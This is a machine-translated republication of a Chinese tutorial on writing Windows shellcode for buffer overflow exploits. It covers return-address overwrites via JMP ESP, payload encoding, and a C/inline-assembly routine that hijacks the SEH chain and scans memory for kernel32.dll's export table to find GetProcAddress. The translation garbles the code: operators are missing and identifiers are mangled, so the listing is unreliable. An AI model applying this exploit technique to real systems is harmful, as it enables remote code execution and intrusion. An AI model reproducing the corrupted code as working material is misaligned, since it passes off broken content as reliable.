Senior skills written in Windows Shellcode

zhaozj2021-02-16  89

Senior skills written in Windows Shellcode

Author: yuange (mailto: yuange@nsfocus.com)

Home: http://www.nsfocus.com/

Unix and other systems because there is user concept, it is often overflow to get ordinary account first, then use overflow after logging in.

Load a shell method to get root permissions, its system call is convenient, so shellcode is generally better than

Simple. But the Windows system often does not provide login services, so shellcode, which is overflowed, often provides Socket

Connect, to load the program to get the shell, and the Windows system calls the int2e interface is not as good as the Unix system call INT80

Specification, so the API is usually used, and the API function address is not the same because the system version is different, so we must write

Windows is more practical below, and gelcode, gelcode is more troublesome.

After a period of thinking, I received a better way to write shellcode under Windows.

1, the overflow point is determined. This way to cover a RET instruction address using the overflow point, so you just know overflow

The point is approximately range.

2, shellcode positioning. Use the ESP register to locate, as long as the RET address covered in front is a JMP

The command address of the ESP function can be positioned.

3, RET command address, JMP ESP function command address using the address, 54 C3, or FF E4

, C3 this language of Windows address is fixed, and it is also very good to find this address.

4, Shellcode directly using C language, easy to write, modify, and debug.

5, shellcode unified encoding, meet the application conditions to the SHELLCODE limit, with a small assembly code

Code, you can write shellcode, you can do it without considering special characters.

6, communication encryption, dealing with firewall, implementing FTP functions, implementing advanced applications of memory directly to Web services.

The following main introductions the introduction to the method of writing general shellcode. The API used in the main shellcode used

GetProcAddress positioning, use libraries to load with LoadLibrarya. That's so shellcode just relying on these two

API. How do you solve the address of these two APIs? Loadlibrarya this API in system library kernel32.dll

Face, you can also get getProcAddress. That is to find the system library kernel32.dll and

GetProcaddress's address. Because the general application will load kernel32.dll, the solution is

Inside the memory found this system library and API address, fortunately, I know that the module data structure of Windows is not difficult, mainly

It is an increase in abnormal structure processing. Below is a VC6.0 program code:

Void shellcodefn ()

{

INT * EXCEPT [3];

FarProc ProcgetAdd = 0;

Char * stradd;

INT IMGBASE, FNBase, I, K, L

Handle Libhandle;

_asm {

JMP nextcall

GetStradd: Pop Stradd

Lea Edi, Except

Mov Eax, DWORD PTR FS: [0]

MOV DWORD PTR [EDI 0x08], EAX

Mov DWORD PTR FS: [0], EDI

}

Except [0] = 0xfffffffff;

Except [1] = stradd-0x07;

/ * Save an abnormal structure chain and modify the abnormal structural chain, Shellcode take over anomalous * / imgbase = 0x77E00000;

/ * Search the start of kernel32.dll's starting address * /

Call getExceptretadd

}

/ * Get an abnormal return address * /

For (; imgbase <0xBFFA0000, ProcgetAdd == 0;) {

IMGBase = 0x10000;

/ * Module address is 64K unit, speed up speed * /

IF (imgbase == 0x78000000) IMGBase = 0xBff00000;

/ * If it has not been searched yet, that may be Win9x system * /

IF (* (word *) IMGBASE == 'ZM' && * (Word *)

(IMGBASE * (INT *) (IMGBase 0x3c)) == 'EP') {

/ * Modular head * /

Fnbase = * (int *) (IMGBASE * (INT *) 0x78) IMGBASE;

K = * (int *) (fnbase 0xc) IMGBASE;

IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') {

/ * Module name * /

LibHandle = IMGBASE;

/ * Get the module header address, the module handle * /

K = IMGBASE * (INT *) (FNBase 0x20);

For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4) {

IF (* (INT *) (IMGBase * (INT *) K) == 'Pteg' && * (INT *) (4 IMGBase * (INT *) K) == 'acor') {

/ * Take the name * /

K = * (Word *) (L L IMGBASE * (INBASE 0x24));

K = * (int *) (fnbase 0x10) -1;

K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c));

ProcgetAdd = K IMGBASE;

/ * API address * /

Break;

}

}

}

}

}

// Search Kernel32. DLL module address and API function getProcAddress address

/ (Note that this is not in the case where the search page is processed.

_asm {

Lea Edi, Except

MOV Eax, DWORD PTR [EDI 0x08]

Mov DWORD PTR FS: [0], EAX

}

/ * Restore anomalous structure chain * /

IF (procgetadd == 0) goto die;

/ * If you didn't find the getProcAddress address dead loop * /

Die: Goto Die;

_asm {

getExceptretadd: POP EAX

Push EAX

MOV EDI, DWORD PTR [stradd]

MOV DWORD PTR [EDI-0X0E], EAX

RET

/ * Get an abnormal return address, and fill in the exception processing module * /

/ * Abnormal processing module * /

Errprogram: MOV Eax, DWORD PTR [ESP 0x0c] Add Eax, 0xB8

Mov DWORD PTR [EAX], 0x11223344 // stradd-0xe

/ * Modify exception Return EIP pointer * /

XOR Eax, EAX / / 2

/ * Do not prompt exception * /

Ret // 1

/ * Abnormal processing returns * /

ExecptProgram: JMP errprogram // 2 bytes stradd-7

NextCall: Call getstradd //5 bytes

}

}

转载请注明原文地址:https://www.9cbs.com/read-11930.html

New Post(0)